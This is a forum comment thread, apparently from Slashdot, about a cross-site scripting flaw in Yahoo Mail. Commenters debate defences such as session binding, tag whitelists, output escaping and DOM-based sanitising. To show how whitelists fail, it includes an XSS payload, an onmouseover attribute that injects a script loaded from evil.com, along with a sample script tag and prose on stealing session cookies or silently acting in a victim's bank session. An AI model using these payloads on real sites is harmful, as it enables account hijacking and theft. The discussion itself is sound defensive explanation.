This URL obviously doesn't match the regular expression above, hence is subject to NoScript anti-XSS filters.
At any rate, looks like Yahoo already fixed it (before the slashdotting, apparently).

SIMPLE SOLUTION

There is a very VERY simple solution to this problem. Try to pair sessionID with IP number of accessing PC. It would tighten security. Only if "the attacker" will be using the same gateway he would be able to break into account using your sessionID.
Thus... simple solutions are not seen by experts... sad...
arivaldh(at)wp(coma)pl

Re:SIMPLE SOLUTION

[Delirium+Tremens]

No, pairing session ID with the IP address of the client does not work. That has been known by experts for a long time.

For those who are not in the know, the problem with that particular solution attempt is that a vast majority of dialup users (AOL-ers, for example) sit behind a dynamic pool of web proxies that can have their IP address reassigned at anytime during the same dialup connection, and therefore during the same browsing session.

Re:SIMPLE SOLUTION

[Fordiman]

The funniest solution was the first comment on that blog:

"To solve these problems, it would be best if developers stopped using languages like Ajax, HTML, Perl, e.t.c. Instead webpages should be written in new safe language which is compiled and executed within a sandbox. This is somewhat like writing the entire webpage as a Java Applet and the applet alone runs. (No HTML, Javascript, e.t.c.)"

I'll let the vultures pick at that one...

Re:SIMPLE SOLUTION

[sasdrtx]

Shooting fish in a barrel holds no thrill for me. Anyone else?

Re:SIMPLE SOLUTION

[Crayon+Kid]

No need to pick at it, it's obviously idiotic.

To get rid of XSS you need to get rid of the injection agent. Which is HTML. Period. As long as a webmail program insists on rendering HTML, eventually someone finds a new way to piggyback JavaScript on it. No matter how much they try to filter the crap out of JS. JS/ECMAScript/HTML and the browsers' support for them evolve all the time. It's a doomed effort from the start. Witness Gmail, Yahoo mail, Hotmail and so on get hit by XSS time and time again.

Re:SIMPLE SOLUTION

[quanticle]

Try to pair sessionID with IP number of accessing PC.

Two things wrong with that argument:

1. Dynamic IP addressing. Dial-up users, and DSL users often sit behind a pool of IP addresses that are handed out dynamically. This means that the user's IP could change during the middle of a session.
2. IP address spoofing. When you get the user to connect to your "evil" site for the cross site scripting vulnerability, you can record their IP address as well, allowing you to duplicate their signature by using an IP address spoofing tool.

Re:SIMPLE SOLUTION

[AKAImBatman]

To get rid of XSS you need to get rid of the injection agent. Which is HTML. Period

You're as bad as the commenter. HTML doesn't fall into this particular problem at all. The problem is with the HTTP protocol and how it gets abused. Specifically, the article is talking about Yahoo using url rewriting to store the session id rather than a session cookie. Since the session is attached to the token in the URL, an attacker would have no problem getting access to your account from the referring URL.

This attack exists regardless of if you're using HTML or some other hyperlinked document. As long as the browser passes the referring URL, you're screwed. Which in the end is Yahoo's fault for forcing url rewriting.

That being said, this *cough* advisory is on a blog called "Net Cooties" that places Paris Hilton behind "penis-painted bars". I'm not sure how far I trust the information they're handing out.

Re:SIMPLE SOLUTION

[AKAImBatman]

Actually, I take that back. You were right, and I apologize. I misread the page. This actually injects an HTML/javascript snippet that steals the cookie. Completely my bad. Go ahead and mod me down.

Re:SIMPLE SOLUTION

[Akatosh]

Binding sessions to ip prevents people from stealing your session and using it on another machine, it does not prevent them from taking over your session and silently doing things inside your own web browser while you sit there clueless.

Ie. If I xss your bank webpage, I can write the code to send the cookie to my webserver... which is worthless because the session is bound to an ip. OR I can write the code to use a xmlhttprequest to silently enter your banking preferences and reset your password/transfer funds/scrape account/routing numbers and haul them offsite in the background while you go about your business. Anything you can do sitting there at your web browser by clicking and typing stuff, someone else can do to you using xss.

Re:SIMPLE SOLUTION

[Fordiman]

The problem is the level of knowledge to make the above post; it's frighteningly remincient of a few executives I've known.

You know, the almost-intelligent combination of buzzwords into the Stupidest Thing You've Ever Heard.

Re:SIMPLE SOLUTION

[SavvyPlayer]

Yes, but the idea of pairing a session ID with *something* to increase the difficulty of such attacks has merit. Take User Agent, Accept, Accept-Charset, Accept-Language, screen resolution, or some rotating, random combination of these (and other things not listed here) indicated in a hidden field encrypted with a CRC-based cipher for example. The algorithm might tolerate one of these changing during a session, but more than one would be rejected (assuming the rejected request was initiated by a bot, the session would remain active for the actual user, so as not to enable DOS attacks).

Re:SIMPLE SOLUTION

[Delirium+Tremens]

Useless proposal. If the attacker can steal the secure session id, stealing any other data such as User Agent is trivial.

Re:SIMPLE SOLUTION

[SavvyPlayer]

You've missed the point. Multi-factor authorization will usually be more effective than single-factor authorization.

mettle

... sign of their /mettle/.

"Yahoo" has no rock dots. I hope you code better than you write.

Sanitizing user imput is the most important part

[Spliffster]

If you want to secure your systems, make sure you do not allow userinput with certain tags (assuming this input is displayed later on in a html page).

Tags like script, iframe, link, style, embed, object _MUST_ be stripped in an untrusted environment. why you may ask: script, iframe, link allow external references (for example injection of code of remote sites which you can not easily check).

script itself is the most evil tag because it allows an attacker to access any element in a page, modify it and inject further remote scripts not stored on your server.

ie interprets javascript and vbcode in style tags /me *shudders* (not sure if this is still true in IE7, in quriks-mode however i am pretty sure this still works in ie7 and non standard compliant mode AKA quirks-mode is the default for most IE only or IE targetted sites).

embed and object tags are used to insert java and activeX code, I guess I do not have to say much about those two techniques, it's again about inserting remote code at runtime.

iframe is, by nature, a fairly secure tag. it can not harm the users page much but it can be used to trick the user in believing to be on another page/site or trick him in any other way. plus, many IE versions had security holes where scripts could travel up from iframe into its parent document to manipulate data from another domain (crossite ;)

There might be some potentially evil tags missing in my list, this is just from the top of my head.

I usually go the other way, instead of restricting tags i define a white-list of tags which are useful for formatting reasons such as strong, em, front, etc. this seems to be a much more controllable way.

HTH,
-Simon

Re:Sanitizing user imput is the most important par

[zaunuz]

Thanks for the info. The way i work around potentially evil tags is that i deny all tags whatsoever, apart from a selected few useful formatting-tags (br, ul, p, etc).
BTW, I forced a coworker with modpoints into modding you up.

at last an idea for hackday !

[amias]

i was struggling for ideas for this weekends Yahoo/BBC Hackday , this might just clinch it !

I could write a bot to steal yahoo accounts based on the names matching keywords in bbc news ;-)

Toodle-pip
Amias

well, what is worse?

well, what is worse?

some user being foolish enough to click on a link in an e-mail?

OR

asking the help staff of the email company to change your alternative email address and then do a password request on it thus successfully stealing the email account? like im really going to name the company, but no, it isnt yahoo.

pop3

[Aliriza]

hotmail has a flaw , it seems that old yahoo has a flaw too , I think we are going back to old pop3 accounts at least the control will be in our hands.

Re:I'd care less if it was site developers problem

lol, I hate IE has much as the next guy, but this has nothing to do with ActiveX.

Paris Hilton?!

[tsa]

I stopped reading right after the bit about Paris Hilton. If you need her to keep your audience reading your article then either you are a bad writer or I am not the target audience.

Re:Sanitizing user imput is the most important par

[Koen+Deforche]

Although sanitizing user input gets the job done, what one should be doing is sanitizing the output .

An XSS attack exists because you are dynamically generating a web page with content you didn't intend: which contains executable script instead of where you intended dumb text (that you got from a database or that was entered earlier on by a (another) user). Sanitizing user input (which is the only factor you don't control) will help but if I enter <script>1+1</script> as some comment on for example a JavaScript forum, I would expect it to appear like that !

The definite solution to getting rid of XSS attacks is to use a modern toolkit that actively prevents this without ANY effort from the programmer. Like Wt for example does.

Re:Sanitizing user imput is the most important par

[Mr_Icon]

I usually go the other way, instead of restricting tags i define a white-list of tags which are useful for formatting reasons such as strong, em, front, etc. this seems to be a much more controllable way.

<strong onmouseover="document.write('<' + 'script s' + 'rc=\"http://evil.com/foo.js\"></script>')">You get the idea</strong>

HTML sanitizing is VERY. HARD. Unless you first run things through tidy, and then manually check all attributes for evil (keeping in mind URL-encoded and unicode-escaped sequences), you WILL FAIL.

You are a lot safer using wiki or REST syntax and converting it to html formatting tags on the back-end. Otherwise you'll be playing a constant game of whack-a-mole.

Not XSS

[brunes69]

The exploit is simply sending an email a link that posts to a fo via JavaScript

On top of that it relies on posting a form to an external domain; such a thing gives a nasty warning in Firefox.

This really has nothing at all to do with XSS, you can do this with any email client that has HTML mail.

Indeed

I hate that mistake. >.

Re:I'd care less if it was site developers problem

[Poromenos1]

Not only that, but they're all but useless. I use Opera, which doesn't support them, and my user experience has never deteriorated because of this.

Re:suck it firefox

[Vexorian]

I know you are a troll, and firefox is totally secure but either way:

There is no excuse in using anything other than konqueror.

How about I don't use KDE?

Are XSS flaws overrated?

[Vexorian]

There is certainly no excuse for web developers not to validate output correctly, but how big of an issue XSS actually is? This one vulnerability requires you to make an user click an odd link, and it took yahoo almost no time to fix it, how many hackers are so good at social engineering that would be able to take advantage of this?

Re:Sanitizing user imput is the most important par

[Spliffster]

Oh yes, certainly. I was not going into the attribute thing, i would disallow all attributes by default (forgot to mention).

Although the parent did not get moderated up, Mr_Icons point is valid and extremely important (if you strip tags but forget to strip attributes in allowed tags, it's not very effective).

Cheers,
-S

Re:suck it firefox

[shvytejimas]

Then use safari. It uses the Webkit rendering engine which is based on Konqueror (HTML) and KDE's kjs (javascript). Even ported to windows, in case you're using them.

Re:suck it firefox

[achbed]

byebye karma

Go Safari!

developers: simple solution

[brunascle]

there is a very simple solution to XSS this that is rarely followed:

never, i repeat, never print out a user-editable string variable directly to a web page. send every single one through a function that, at the very least, replaces all '<' and '>' to '&lt;' and &gt;

Sanitize by reconstruction

Parse the HTML into a DOM tree, and then write the DOM back out to HTML after filtering the tags and attributes -- only whitelisted ones allowed. If it's malformed HTML that can't be parsed, too bad, it'll get wiped.

And XSS is...?

"It's looking like most web developers don't even know or care about XSS."

It's also looking like most users don't even know or care about XSS.

Rules of Thumb?

[Slashdot+Parent]

Are there any rules of thumb that can be used to stop XSS hacks for those of use who just want to write secure code but don't really feel like becoming experts in XSS?

For instance, it is trivial to protect yourself from SQL Injection hacks. Just use substitution variables:

SELECT first_name, last_name FROM users WHERE userid=$in_userid

would become

SELECT first_name, last_name FROM users WHERE userid=?

And then just set that variable. Magic, no SQL Injection possible (as long as you trust your DB libraries!).

Is there a similar way to insulate yourself against XSS so we can just go back to writing code that doesn't suck?

Re:Rules of Thumb?

[AKAImBatman]

Is there a similar way to insulate yourself against XSS so we can just go back to writing code that doesn't suck?

It would help if we stopped generating web pages as if they were text. Code like "" represents a recipe for disaster.

Dynamically creating the DOM on the server side would be a great start. Just build up the model in memory (much like you use prepared statements for SQL), then write it out to the client when you're done. That would eliminate a good chunk of XSS vulnerabilities right there. Even though someone could still submit "<script src="http://evil.com">" to you, it can't hurt you if it's output as "&lt;script src="http://evil.com"&gt;".

Re:Rules of Thumb?

[AKAImBatman]

Doh! That's supposed to say: Code like "<%=mytext%>" represents a recipe for disaster.

I'm off to get some coffee. I'm obviously not doing so well without it. :-/

Bottom line: Developers don't care

[MobyDisk]

It's looking like most web developers don't even know or care about XSS I think the summary was trolling, but even so they got it dead on.

I've worked on several web projects over the years, and I've never met a single developer who even knew or cared about XSS. In all of those projects none of them, other than myself, bothered to even escape strings when sending out to HTML. In some cases, they will go out of their way to _not_ escape them. Like in ASP.NET, using HTML literal controls (which don't escape HTML content) instead of using text controls (which do). The reasoning was that the .000001% optimization it provides is more important than the risk of a security problem.

Re:Bottom line: Developers don't care

[r7]

I've never met a single developer who even knew or cared about XSS I'm one who does care, but other than SSL there really is little that can be done about XSS. Sure you can put ever more layers of validation in the client, all of which can be worked-around with various levels of difficulty. That's the wrong tool for this job. The right tool is SSL and session tracking.

Second problem is you cannot build security on a foundation of shifting sand. Witness the security holes introduced in Firefox2 that didn't exist in Firefox1, or Microsoft's insistence on using activex after all these years of known vulnerabilities. The worst offender, however, is javascript. No Javascript implementation is without vulnerabilities.

Pure Man of Genius

[Slashdot+Parent]

That's a great way for a browser-based email client to display HTML email. Oh, I'm sure that will pass user acceptance testing. Instead of rendering the email, just show a sea of unintelligible HTML markup.

You, sir, are a Pure Man of Genius.

Re:Pure Man of Genius

[brunascle]

gah, guess i should have RTFA. didnt realize we were talking about webmail.

Re:Pure Man of Genius

[Slashdot+Parent]

Heh, yeah I see, as usual, the slashdot blurb is a little short on details.

But I think the point still remains, that sometimes the requirements are that you accept markup from an untrusted source. Unfortunately, I don't think that there is a good way to fix this, as evidenced by all of the high-profile attacks.

Just look at all of the comments to this article:
"You must filter all inputs for tags!"
"No, stupid, you must filter all outputs!"
"XML-Parse all inputs and whitelist any acceptable tags!"
"Don't forget the attributes! Javascript can be hidden in there!"

This issue is a real nasty one because there is no silver bullet. And, no, I don't consider replacing all "<"s with a &lt; is the right answer, either, since sometimes you really do need to accept markup from the user.

A silver bullet would be like the silver bullet to stop all SQL Injection attacks: Use substitution variables, and the SQL library will always defend you. When a new attack comes along, upgrade your library and sleep well at night. It works in every language and with every database.

But XSS. That's a real hairball of a problem.

Re:Pure Man of Genius

[brunascle]

And, no, I don't consider replacing all "<"s with a lt; is the right answer, either, since sometimes you really do need to accept markup from the user.

true, but i think the first step is identifying when you do and dont want to accept markup. when you dont, the solution is cut and dry, very easy: filter the output. you never have to worry about that part again.

you only need to focus on the parts that do accept user markup. depending on the context, it may be easy, maybe not. webmail for example, i dont see an easy solution there. XML parsing isnt adequate because it probably wont be in XHTML, and by the time your server gets the email it's too late to tell the user to fix the markup.

but, for something like a blog post where the user is composing the markup on your server, that's when XML parsing shines. you can use the user's browser to parse their markup into a DOM structure, then have a function that goes through the DOM and creates a valid XML document string. upload that XML document string to the server and do the XML parsing and reformatting server-side.

Re:Pure Man of Genius

[MntlChaos]

but, for something like a blog post where the user is composing the markup on your server, that's when XML parsing shines. you can use the user's browser to parse their markup into a DOM structure, then have a function that goes through the DOM and creates a valid XML document string. upload that XML document string to the server and do the XML parsing and reformatting server-side.

Okay. Now this assumes that users can write valid XML. What do you do if the user doesn't close a tag? Besides, you still have the problem of determining what is and is not safe to display.

Re:Sanitizing user imput is the most important par

[Slashdot+Parent]

i would disallow all attributes by default (forgot to mention).

Makes the <a> tag kind of useless, eh?

MOD PARENT DOWN!

[AKAImBatman]

Not up! As I said above, I was wrong. Mods, please oblivionate the message to -1 Overrated. Obviously, I shouldn't comment without caffeine in my veins. :P

Re:MOD PARENT DOWN!

maybe it's the paris hilton behind penis painted bars

Re:suck it firefox

[Vexorian]

Isn't that Safari and not konqueror then?

The Cross Site Scripting FAQ

[mrkitty]

http://www.cgisecurity.com/articles/xss-faq.shtml

I agree

[oni]

but as other posters here have pointed out, some users' ISPs dork around with IPs. I have never understood why they do that? It doesn't increase throughput. I mean, I'm sure that AOL is multihomed, but switching a user from IP address x.y.z.100 to x.y.z.101 isn't moving them to a different segment, so I don't see how it helps anyone at all. I just don't get it.

Re:I agree

[CtrlFreq]

The problem isn't the speed of the network, it's the speed at which an individual server can proxy requests under load. A single server is only capable of handling a certain number of transactions per second, so with a large bank of servers, there is a good chance that you will need to regularly redistribute the load to keep from bogging down any particular server.

It has been fixed already ...

[Gopal.V]

> What is most showing is how fast it will be till Yahoo fixes this vunerability as a sign of their metal.

It is already fixed. And probably the security testing team added a new test-case to prevent recurrences.

What went on here is a pure case of ASWing. Nearly every non-trivial application has a fair share of holes, some are just more high-rewards than others. We've found XSS issues in Orkut, during random exploration. But having grown past sixteen, I've sent an email to the orkut feedback black hole and next morning found the bug to be fixed without even a thank-you in reply (it sucks, but that's how nearly everyone treats security bug reporters).

I'd have settled for a free Google t-shirt, but the guy in TFA doesn't deserve anything but censure for his fear-mongering.

Re:Sanitizing user imput is the most important par

He DID say by default, meaning that he most likely has certain attributes of certain tags that are not stripped (otherwise it's redundant and useless to say "by default").

You're a moron

"It's looking like most web developers don't even know or care about XSS."

Do you have a job?

I've told managers and higher ups that things were not ready on projects I've worked on. I've said there were gaps in code many, many times. They often don't care, and just want to be first to market.

Saying there is a problem as a "web developer" doesn't mean shit, and "web developers" are often not responsible, and have little influence on, saying something "has to go out now" - regardless of if it has problems or not.

I am tired of morons like you that blame the guys in the trenches who have no control over when things go out. If a web developer is not done with something, but they are told it has to go out now anyway, how is that the web developers fault or lack of knowlege?

They also have no ability to hire security managers, or ability to mandate unit testing, or anything else.

The perception of time to market on web software from the pocket book's point of view is a ridiculously small time frame. It almost always - I repeat almost always - puts code out unfinished and untested.

Blaming the "web developer" for these problems shows you have no idea what you are talking about.

You must be a manager.

XSS in real life

[sm8000]

Bet you never thought it could create a stir in forum drama and politics. At the web's largest tech forum, no less. This is from last October: http://www.pictars.com/users/sm8000/ATMod1280.jpg

mods on crack again

Who modded this funny? It's 100% true. Stupid M$ astroturfers.

Not the fault of developers

[holophrastic]

It's not the developer's fault that security problems like these appear. I promise -- in general developers do what they're told. How many carpenters are responsible for the insulation in your home? What about the alarm systems? Welcome to multiple jobs and multiple persons.

But it's a lot more than that. First off, what idiot thinks that if you avoid XSS, you're secure? Unless you're willing to drop everything and analyze hundreds of security issues, plugging one hole doesn't do anything at all. So the decision is not whether or not to plug XSS, it's whether or not to care about security. In the business world, that translates into "how much should we care about security" or "how much time/effort should go into security".

It's the same thing with your car -- in fact, it's identical. Does your car have air bags? I'll bet it does. Does your car have seat belts? I'll bet it does. Funny thing though -- F1 cars have neither. We've all seen racing with cars flipping, burning, and drivers walking away unscathed. Does your car have a roll-cage? What about a four-point harness? Why not? Simple: not worth the trouble. How many car injuries would be solved with harnesses? You'd have to ignore the injuries from people driving off of a cliff -- which people do. People like to die.

Back to the business decision of how much time to spend on security. That too gets translated quickly in teh business world. Now it's: "what's more important, this big feature over here, or this security hole over there?". And again, the reasoning is pretty clear:

New application feature: brings more business, looks good, more usability, first to market, can charge for it, innovation, patents, competitive edge.

Block security hole: there is just going to be another one, new application features create code flux that solves security holes by accident anyway, it's a performance loss, keeping them open doesn't guarantee that anything bad will happen, no one notices when you're site is more secure, and ultimately the only point of security in these cases is to hinder malicious criminals. Malicious criminals are at fault and responsible for their actions. What's more, you're never going to stop Ethan Hunt no matter how many security holes you plug.

I'm not against security -- if for no other reason, security breeds reliability: something computers frequently don't have. But to get caught up in security at the cost of everything else is just silly. Obviously, air-craft control, nuclear reactors, and space-based lasers are exceptions -- that's why my software licences explicitly prohibit my web portals from being used to control the shuttle. But when it comes to your geocities web-page listing your favourite books, top-level security is just plain stupid. Even when it comes to your credit card, you aren't responsible for fraudulent charges. And when it comes to your bank account, banking actions can be easily reversed.

So you're left with the nuisance of having to get new credit cards, or be bothered with your bank. It's annoying, and it can be devastating, but it's not dangerous. In my mind, that means it warrants security level two -- not one. So come up with what you believe is security level one, and then drop it down a few notches for your bank. Drop it down more for your e-mail. Drop it down all the way for your geocities account. And keep in mind that no one cares about your favourite books.

on salt...

You would be amazed. Most "programmers" have no clue about what "salt" means. I don't believe you can consider one a programmer unless she has some basic security knowledge. Yet 99.9% "programmers" out there don't even have a clue about what "salt" means.

This world is pathetic.

Re:Sanitizing user imput is the most important par

[Ambush+Commander]

I've already moderated in this discussion, but I'll bite. Am I?

You people need to stop skirting around the issue by inventing new markup languages and actually solve the problems with proper libraries for each language. There is already a solution for PHP (HTML Purifier): how about more languages?

Any HTML filtering library will be complicated, but it will be much less complicated than a web-browser, which actually has to do things with the HTML. All a filter has to do is validate.

hmm..maybe I could get my account back

[Pope+Raymond+Lama]

Since other bugs in yahoo make it mail me a new password in an e-mail which is not the one I get my (yahoo) mailing lists delivered to, and no other way to restore access to my account.